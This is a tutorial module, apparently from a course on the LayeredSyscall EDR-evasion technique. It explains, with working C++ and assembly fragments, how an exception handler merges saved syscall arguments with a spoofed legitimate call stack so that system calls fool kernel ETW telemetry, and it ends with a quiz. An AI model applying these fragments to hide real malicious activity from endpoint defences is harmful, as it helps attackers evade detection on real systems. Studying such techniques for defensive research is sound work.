Module 7: Argument Marshalling & Syscall Execution
Registers from the past, a stack from the present — the Frankenstein context that fools kernel telemetry.
The Critical Moment
When the three-condition algorithm (Module 6) reaches IsSubRsp == 2, we hold two things: a saved context from the original syscall (containing all the real arguments) and a live stack with genuine call frames from the MessageBoxW chain. The context swap merges these into a single execution state: real arguments + legitimate call stack. This is the moment everything comes together.
The Context Swap
When IsSubRsp reaches 2, the handler performs the most critical operation in the entire technique — the context swap. This is a carefully ordered sequence that preserves exactly what we need from each context.
C++// IsSubRsp == 2: All three conditions met
if (IsSubRsp == 2) {
// Step 1: Save the CURRENT RSP (legitimate call stack)
ULONG_PTR TempRsp = ExceptionInfo->ContextRecord->Rsp;
// Step 2: Restore the SAVED context (real syscall arguments)
// This overwrites ALL registers including RSP
memcpy(ExceptionInfo->ContextRecord,
&SavedContext,
sizeof(CONTEXT));
// Step 3: Replace RSP with the legitimate stack pointer
// This keeps the genuine call frames from MessageBoxW chain
ExceptionInfo->ContextRecord->Rsp = TempRsp;
// ... (syscall emulation and argument copying follow)
}
Step-by-Step Breakdown
| Step | What Changes | Why |
|---|---|---|
| Save TempRsp | Copy current RSP to a local variable | The current RSP points to the legitimate call stack (MessageBoxW → user32 → ntdll). We must not lose this. |
| Restore SavedContext | Overwrite the entire CONTEXT with the saved snapshot | This restores RCX, RDX, R8, R9 (first 4 arguments), RAX, and all other registers to their values at the original syscall breakpoint |
| Replace RSP | Overwrite RSP with TempRsp | The saved RSP pointed to the wrapper function's stack. We replace it with the legitimate stack so the call frames above us are from the MessageBoxW chain. |
Context Swap Visualized
SavedContext (from Phase 2)
Current Context (from trace)
Green = kept, Red = discarded. The final state has real arguments + legitimate stack.
Syscall Emulation
After the context swap restores the real arguments, the handler must set up the CPU state exactly as if the ntdll syscall stub had executed normally. This means emulating the two instructions that the stub performs before the syscall opcode:
x86-64 ASM;; Normal ntdll stub (what we are emulating):
mov r10, rcx ; Save first argument (syscall clobbers RCX)
mov eax, <SSN> ; Load System Service Number
syscall ; Enter kernel
C++// Emulate: mov r10, rcx
ExceptionInfo->ContextRecord->R10 =
ExceptionInfo->ContextRecord->Rcx;
// Emulate: mov eax, SSN
ExceptionInfo->ContextRecord->Rax = SyscallNo;
// Point RIP directly at the syscall instruction
ExceptionInfo->ContextRecord->Rip =
SyscallEntryAddr + OPCODE_SYSCALL_OFF;
Why R10 = RCX?
The x64 syscall instruction is destructive: it saves the return address in RCX (overwriting whatever was there) and saves RFLAGS in R11. This means the first argument (originally in RCX per the Windows x64 calling convention) would be lost. The ntdll stub copies RCX to R10 before the syscall so the kernel can read the first argument from R10 instead. LayeredSyscall must replicate this behavior.
| Register | Value Set | Purpose |
|---|---|---|
R10 | Copy of RCX (first argument) | Kernel reads arg1 from R10 since syscall clobbers RCX |
RAX | System Service Number (SSN) | Kernel uses RAX to index the System Service Descriptor Table (SSDT) |
RIP | SyscallEntryAddr + OPCODE_SYSCALL_OFF | Execution resumes directly at the syscall instruction inside ntdll |
Extended Arguments (5th through 12th)
The x64 Windows calling convention passes the first four arguments in registers (RCX, RDX, R8, R9). Any additional arguments go on the stack. The context swap restored the registers but used the legitimate stack (TempRsp). That stack does not have the original arguments 5+. They must be copied from the saved stack.
C++if (ExtendedArgs) {
ULONG_PTR Rsp = ExceptionInfo->ContextRecord->Rsp; // Legitimate stack
ULONG_PTR SavedRsp = SavedContext.Rsp; // Original stack
// Copy arguments 5 through 12 from saved stack to legitimate stack
*(ULONG_PTR*)(Rsp + FIFTH_ARGUMENT) = *(ULONG_PTR*)(SavedRsp + FIFTH_ARGUMENT);
*(ULONG_PTR*)(Rsp + SIXTH_ARGUMENT) = *(ULONG_PTR*)(SavedRsp + SIXTH_ARGUMENT);
*(ULONG_PTR*)(Rsp + SEVENTH_ARGUMENT) = *(ULONG_PTR*)(SavedRsp + SEVENTH_ARGUMENT);
*(ULONG_PTR*)(Rsp + EIGHTH_ARGUMENT) = *(ULONG_PTR*)(SavedRsp + EIGHTH_ARGUMENT);
*(ULONG_PTR*)(Rsp + NINTH_ARGUMENT) = *(ULONG_PTR*)(SavedRsp + NINTH_ARGUMENT);
*(ULONG_PTR*)(Rsp + TENTH_ARGUMENT) = *(ULONG_PTR*)(SavedRsp + TENTH_ARGUMENT);
*(ULONG_PTR*)(Rsp + ELEVENTH_ARGUMENT) = *(ULONG_PTR*)(SavedRsp + ELEVENTH_ARGUMENT);
*(ULONG_PTR*)(Rsp + TWELVETH_ARGUMENT) = *(ULONG_PTR*)(SavedRsp + TWELVETH_ARGUMENT);
}
Argument Offset Table
| Argument | Passing Method | Stack Offset | Hex |
|---|---|---|---|
| 1st (arg1) | RCX register | — | — |
| 2nd (arg2) | RDX register | — | — |
| 3rd (arg3) | R8 register | — | — |
| 4th (arg4) | R9 register | — | — |
| 5th | Stack | RSP + 0x28 | FIFTH_ARGUMENT |
| 6th | Stack | RSP + 0x30 | SIXTH_ARGUMENT |
| 7th | Stack | RSP + 0x38 | SEVENTH_ARGUMENT |
| 8th | Stack | RSP + 0x40 | EIGHTH_ARGUMENT |
| 9th | Stack | RSP + 0x48 | NINTH_ARGUMENT |
| 10th | Stack | RSP + 0x50 | TENTH_ARGUMENT |
| 11th | Stack | RSP + 0x58 | ELEVENTH_ARGUMENT |
| 12th | Stack | RSP + 0x60 | TWELVETH_ARGUMENT |
Why 0x28 for the 5th Argument?
On x64 Windows, the caller allocates 32 bytes (0x20) of shadow space (also called "home space") on the stack even for the first 4 register arguments. The return address occupies another 8 bytes at RSP + 0x00. So the 5th argument starts at RSP + 0x28 (shadow space 0x20 + return address 0x08 = 0x28). Each subsequent argument is 8 bytes further.
Why Not Always Copy?
Functions with 4 or fewer arguments (like NtClose with 1 argument) do not use stack arguments. The ExtendedArgs flag avoids unnecessary memory writes for these simple functions. This is both a performance optimization and a safety measure — writing to stack locations that are not expected to hold arguments could corrupt other data.
Clearing the Trap Flag
After the context swap and syscall emulation are complete, the handler must clear the Trap Flag. If it remains set, every instruction of the real syscall stub (and potentially kernel code) would trigger SINGLE_STEP exceptions, which would be catastrophic.
C++// Clear the Trap Flag - stop single-stepping
ExceptionInfo->ContextRecord->EFlags &= ~0x100;
// Reset the state machine for the next wrapped syscall
IsSubRsp = 0;
return EXCEPTION_CONTINUE_EXECUTION;
// Execution resumes at the syscall instruction with:
// - Real arguments in registers (RCX, RDX, R8, R9)
// - R10 = RCX (syscall convention)
// - RAX = SSN
// - RSP pointing to legitimate call stack with args 5+ copied
// - RIP at the syscall instruction inside ntdll
What Happens Next
The syscall instruction executes inside ntdll.dll memory, with genuine call stack frames above it, correct arguments, and the proper SSN in RAX. The kernel processes the request normally. To the kernel's ETW telemetry, this looks like a completely legitimate system call from a standard API chain.
Phase 4: Clean Return via Dr1
After the kernel completes the syscall, execution returns to the ret instruction in the ntdll stub (immediately after the syscall instruction). The Dr1 hardware breakpoint fires, generating another EXCEPTION_SINGLE_STEP.
C++// Inside HandlerHwBp - Phase 4: Return breakpoint
if (ExceptionInfo->ContextRecord->Rip ==
SyscallEntryAddr + OPCODE_SYSCALL_RET_OFF)
{
// 1. Disable Dr1 breakpoint (clear bit 2 in Dr7)
ExceptionInfo->ContextRecord->Dr7 &= ~(1 << 2);
// 2. Restore the original RSP from SavedContext
// This points back to the wrapper function's stack frame
ExceptionInfo->ContextRecord->Rsp = SavedContext.Rsp;
// 3. Continue execution - the 'ret' instruction will now
// return to the wrapper function as if nothing happened
return EXCEPTION_CONTINUE_EXECUTION;
}
Why Restore RSP Here?
During the syscall, RSP pointed to the legitimate stack (from the MessageBoxW chain). But the wrapper function expects to resume with its own stack frame. By restoring SavedContext.Rsp, the ret instruction pops the correct return address and execution returns to the wrapper function. The return value (NTSTATUS) is in RAX, exactly where the wrapper expects it.
Clean Return Flow
RAX = NTSTATUS
SINGLE_STEP
Restore RSP
Returns to wrapper
Returns NTSTATUS
Memory Layout During Execution
Understanding the state of RSP at each phase is critical to understanding the full technique:
Stack State at Each Phase
Phase 2: Syscall BP
Phase 3: After Swap
Phase 4: After Return
The Complete Wrapped Syscall List
LayeredSyscall wraps approximately 31 native API functions. Here is a representative subset grouped by category, showing their argument counts and whether they require extended argument copying:
Process & Thread
| Function | Args | ExtendedArgs |
|---|---|---|
NtCreateUserProcess | 11 | TRUE |
NtOpenProcess | 4 | FALSE |
NtTerminateProcess | 2 | FALSE |
NtCreateThreadEx | 11 | TRUE |
NtOpenThread | 4 | FALSE |
NtResumeThread | 2 | FALSE |
NtSuspendThread | 2 | FALSE |
Memory
| Function | Args | ExtendedArgs |
|---|---|---|
NtAllocateVirtualMemory | 6 | TRUE |
NtProtectVirtualMemory | 5 | TRUE |
NtFreeVirtualMemory | 4 | FALSE |
NtWriteVirtualMemory | 5 | TRUE |
NtReadVirtualMemory | 5 | TRUE |
NtMapViewOfSection | 10 | TRUE |
NtUnmapViewOfSection | 2 | FALSE |
Section, Query & Token
| Function | Args | ExtendedArgs |
|---|---|---|
NtCreateSection | 7 | TRUE |
NtQueryInformationProcess | 5 | TRUE |
NtQuerySystemInformation | 4 | FALSE |
NtQueryVirtualMemory | 6 | TRUE |
NtOpenProcessToken | 3 | FALSE |
NtDuplicateToken | 6 | TRUE |
NtAdjustPrivilegesToken | 6 | TRUE |
Handle & Object
| Function | Args | ExtendedArgs |
|---|---|---|
NtClose | 1 | FALSE |
NtDuplicateObject | 7 | TRUE |
NtWaitForSingleObject | 3 | FALSE |
Notable Absence: NtSetContextThread
NtSetContextThread cannot be wrapped because it modifies thread context — including the debug registers that LayeredSyscall depends on. Wrapping it would create a circular dependency: the hardware breakpoints need to be active to intercept the syscall, but the syscall itself would modify those same breakpoints.
Module 7 Quiz: Argument Marshalling
Q1: Why does the syscall emulation set R10 = RCX?
syscall instruction saves RIP into RCX and RFLAGS into R11. This destroys the first argument (which was in RCX). The ntdll stub copies RCX to R10 before issuing syscall so the kernel can read the first argument from R10. LayeredSyscall emulates this behavior.Q2: At what stack offset does the 5th argument begin, and why?
Q3: What does the Dr1 breakpoint handler do after the syscall returns from kernel mode?
SavedContext.Rsp (the wrapper function's stack pointer). When the ret instruction executes, it pops the return address from the original stack and returns to the wrapper function with the NTSTATUS result in RAX.